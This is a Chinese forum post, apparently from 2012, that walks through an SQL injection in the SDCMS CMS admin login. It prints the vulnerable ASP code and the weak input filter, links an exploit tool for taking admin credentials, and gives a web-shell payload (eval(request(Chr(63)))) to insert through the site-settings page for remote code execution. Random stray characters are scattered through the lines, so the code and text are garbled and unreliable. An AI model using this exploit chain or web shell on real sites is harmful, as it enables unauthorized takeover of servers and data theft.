作者:T00LS 鬼哥6 L' p$ M, D. R: g. G+ @
漏洞文件:后台目录/index.asp
* X0 p7 k/ q8 }& N+ u' j# ^% K* o# M8 P3 n* z- Z0 K0 Z1 P1 ?' a
Sub Check4 p; M2 v% q4 q
Dim username,password,code,getcode,Rs
9 a) |$ z2 w- u$ S, Y E IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
' O- y. ]2 j, g; {9 m9 i4 X) b username=FilterText(Trim(Request.Form("username")),1)
) Y- q1 u. t" Z1 X+ D password=FilterText(Trim(Request.Form("password")),1)
m! C# L; b1 V( F$ J. J code=Trim(Request.Form("yzm"))
: {" m. M& A2 |% _9 ^ getcode=Session("SDCMSCode")
+ y7 G) L+ Z. T. H# A/ a5 Q# e1 ~ IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
- R3 ^ D. B: o9 U7 }" D IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
' c2 e8 ` l% B1 f IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied; C5 \2 O0 E; y' f! i
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
; P! Q& y4 l- s# [; K' ^ IF username="" or password="" Then
" T1 S( D0 ]4 H$ `$ I( H& h Echo "用户名或密码不能为空"ied
( Z5 R" t- S2 ?1 L5 c Else
/ i5 S3 V- G Z. \ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")( @ d |6 d$ P! F) T/ G
IF Rs.Eof Then
, t+ i+ Q% D& p2 G, ^* g AddLog username,GetIp,"登录失败",1
1 Z% w" Q% o9 d) e$ T Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"( d9 |3 x2 H0 y m* o3 J6 T1 L
Else
" i; V! t+ ]4 g. y& f5 x: L6 P; J# ^8 S Add_Cookies "sdcms_id",Rs(0)
" {- E3 [# h- E( U1 | Add_Cookies "sdcms_name",username; g6 J; E b: h9 _- q8 N' j
Add_Cookies "sdcms_pwd",Rs(2)
, [5 d5 E; ]+ o$ R4 T s" w Add_Cookies "sdcms_admin",Rs(3)
7 @* K5 v* z* h7 W9 j& N j Add_Cookies "sdcms_alllever",Rs(4)& A0 ?2 R# a4 m z- ]2 @& D* i
Add_Cookies "sdcms_infolever",Rs(5)- I' m7 K! o2 b# ^' Z# \
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
/ q+ ~, p. e1 {( A$ [/ V& C( |- c4 V AddLog username,GetIp,"登录成功",1
8 D* E1 [1 U! {: m '自动删除30天前的Log记录! S' @' t& V" _7 Z2 {
IF Sdcms_DataType Then+ W6 i5 o5 v% T: N$ H0 _
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
1 n, T v' a+ ^( a( O! s. S Else1 y X0 h# }* O; K/ V
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 d, @6 K' X. }8 T+ E! E$ S End IF
& {5 W! U4 c( D8 O) ~; x9 m% z Go("sdcms_index.asp")6 N' g, j) I) L+ l" B9 D
End IF5 b" L2 M( I+ P, R: z# W0 B
Rs.Close
% l% Y! M6 O1 t5 L Set Rs=Nothing( k4 _& J q" m
End IF
1 ~% ]* o8 E8 O6 q) B1 i6 y! `4 dEnd Sub, a% ?' x. s8 L8 C7 X
0 [& O/ B: @% B7 l’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码" Q$ A1 q9 y% W! {+ g) w* e& P( F
7 f: M! q/ P9 [, W4 QFunction FilterText(ByVal t0,ByVal t1)# D- e% z% {8 X% g' F
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function' F% w5 S5 Z q
t0=Trim(t0)
* B9 e' u6 j. y0 U Select Case t16 T5 r: |' _1 Q# r6 ?
Case "1"5 _' S# p: I$ E; p8 r
t0=Replace(t0,Chr(32),"")
' a. r1 A0 j0 J* M3 k) j t0=Replace(t0,Chr(13),"")% O7 {6 v: O1 F
t0=Replace(t0,Chr(10)&Chr(10),"")0 }! A4 ?6 _* B' P8 W
t0=Replace(t0,Chr(10),"") t+ N, f7 q, O8 ^# ]; B
Case "2"
5 R6 q4 z$ D4 p; |& L t0=Replace(t0,Chr(8),"")'回格
8 `4 l3 R( r8 b& _ n+ |2 ~ t0=Replace(t0,Chr(9),"")'tab(水平制表符)' f, ~* Q: D9 g$ ]6 b( q5 b# G; M5 u0 u
t0=Replace(t0,Chr(10),"")'换行
6 \$ Q) g0 `, x/ F( P; a8 R t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 F3 K4 h( D, x! n7 O
t0=Replace(t0,Chr(12),"")'换页5 R, t- r/ p: Q. j- J( k
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合/ X4 R* {: J' a1 G- a! A3 Y" Y
t0=Replace(t0,Chr(22),"")
( H% `$ Z. l! C# G t0=Replace(t0,Chr(32),"")'空格 SPACE1 M. ? H) i2 U! x0 g, D2 d
t0=Replace(t0,Chr(33),"")'!
& j2 B- O9 B; o) X$ ~ t0=Replace(t0,Chr(34),"")'"
5 e4 X) k0 x, m: y t0=Replace(t0,Chr(35),"")'#, U0 V. w1 S2 j# ^
t0=Replace(t0,Chr(36),"")'$
, j1 P* U: W7 `1 O+ {) R t0=Replace(t0,Chr(37),"")'%
/ a% s& M/ X, z t0=Replace(t0,Chr(38),"")'&* M& @) w$ F; G7 a+ |& L) s
t0=Replace(t0,Chr(39),"")''
; Q2 p$ S; P0 P. ^$ H U& l t0=Replace(t0,Chr(40),"")'( [# G& x1 H# b. h/ E7 p! g2 x- Z& ]
t0=Replace(t0,Chr(41),"")')2 P$ T4 u/ d; b: E
t0=Replace(t0,Chr(42),"")'*
0 ~ d2 T, q$ u J t0=Replace(t0,Chr(43),"")'+
1 Y1 P# W! i3 H% x4 y9 u t0=Replace(t0,Chr(44),"")',
7 O! P1 J- {+ q2 V5 J$ k, H t0=Replace(t0,Chr(45),"")'-& b% i9 ?) e5 |$ i! b5 j& J
t0=Replace(t0,Chr(46),"")'.
: D1 z, T& M- k- |. b y* H/ D: P t0=Replace(t0,Chr(47),"")'/
- W: L2 q; I! o& P* h t0=Replace(t0,Chr(58),"")':+ a4 \5 C, ?4 x
t0=Replace(t0,Chr(59),"")';3 E/ S; f+ |4 A
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
B, ^" N* l& t% d$ R t0=Replace(t0,Chr(63),"")'?
% w7 o. d" l3 o/ d; L t0=Replace(t0,Chr(64),"")'@: y a E' M( q$ R# @$ y ]
t0=Replace(t0,Chr(91),"")'\' A9 f7 n$ f) ]1 V. K' ~6 l
t0=Replace(t0,Chr(92),"")'\
7 {6 a& P# \% i, ?# N) j t0=Replace(t0,Chr(93),"")']4 w$ p% P J. R: c, p# x$ Z
t0=Replace(t0,Chr(94),"")'^3 _7 W* H5 n8 u# F
t0=Replace(t0,Chr(95),"")'_
8 q! ]7 X7 m1 p5 Y t0=Replace(t0,Chr(96),"")'`
& O4 U% G2 J% {6 P0 V4 ^+ N7 g t0=Replace(t0,Chr(123),"")'{
0 L( A6 |7 r2 Z& w: \ t0=Replace(t0,Chr(124),"")'|% l& ~5 n, h; a8 C% v
t0=Replace(t0,Chr(125),"")'}. g+ C! P0 ?) P) P# N' y
t0=Replace(t0,Chr(126),"")'~
/ n+ Z) t+ `7 F! p% r Case Else* }3 Q {; S- R
t0=Replace(t0, "&", "&")$ H) f' T; _7 l
t0=Replace(t0, "'", "'")# ~: |4 o6 [4 N( P1 S: d) F
t0=Replace(t0, """", """)
# z) h7 U; D' D) P; v: q t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")) V# h: M0 t2 E5 @& G9 A
End Select
1 w. W# o6 `& S7 M& d L: S; h: V9 R IF Instr(Lcase(t0),"expression")>0 Then2 E2 V, Y/ s6 a z9 u
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
; T+ k1 e+ A7 Z$ X& c U, Z, }& J2 a End If
" G) S7 @ O$ d W FilterText=t0
_9 {4 d; o! P/ F: C' @5 tEnd Function1 w+ y! I9 c( f0 n; Q% c
. f/ f6 T; a! |6 V
看到没。直接参数是1 只过滤& T/ y+ r: e+ A% \4 y# f/ _
t0=Replace(t0,Chr(32)," ")1 G2 q; n" L6 [ o
t0=Replace(t0,Chr(13),"")
0 g* U9 [; _1 Q y, E, f9 |- N t0=Replace(t0,Chr(10)&Chr(10),"1 c: d$ r& s( [7 F1 I9 |
")
8 N* i9 v; Z7 X- D( u! Z, E5 F: m0 g t0=Replace(t0,Chr(10),"5 B+ B: Q: T. z: m# m# V/ i
")
0 a1 m1 O6 a* z6 U漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
$ E+ K0 k3 c. M6 E1 UEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP" U: ^# r8 P# R D8 {
# i0 d& h0 |9 n; C2 J; s- j5 a测试:+ `# y& b2 Q3 F" s5 e+ B" i
8 B( d) P4 J- C, ?0 L
7 t; w" z! {4 ?" r+ W6 T7 e4 P现在输入工具上验证码,然后点OK w7 }2 `: o( R; z" \0 y9 \$ D) ~ M
4 }; m1 ]' D* @2 ]% ^) f, s- `0 T8 o& E% u7 {7 Z
看到我们直接进入后台管理界面了,呵呵!. Q3 x; Q4 t: K
# }2 Z: e# R0 l G) \
4 r* j% \5 `/ _; D
2 @ O0 Q: z- o, x# H( M8 J5 b这样直接进入后台了。。。。1 v( H" \4 r4 k0 _* C$ e; i. ?: Y
6 B- D/ I' Q% Y& T5 H
Z2 L4 R! \" c2 {5 r% }
: n G j7 C6 ]' b- USDCMS提权: v$ e) p4 n8 D5 N2 S+ w
2 Y* B, K4 O3 ?" J- T
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
$ o5 `" v7 R* u6 U) O4 I6 l. d; N/ j7 f9 y7 Y( m
+ y6 I" g( p! s' y3 g/ a
! G0 A3 G, l# }: q6 s( _; |OK,现在用菜刀连接下!
4 Z# a# p1 k( |3 M8 t. Z
0 Z/ ^1 L# H M! j q, D" d8 E, d) g; x o
( c7 ^- L$ [1 B" P t; G$ y5 H! U$ P. ?$ h3 n
4 O' W' F% y+ V$ T |
发表于 2012-11-9 20:57:02
收藏
支持
反对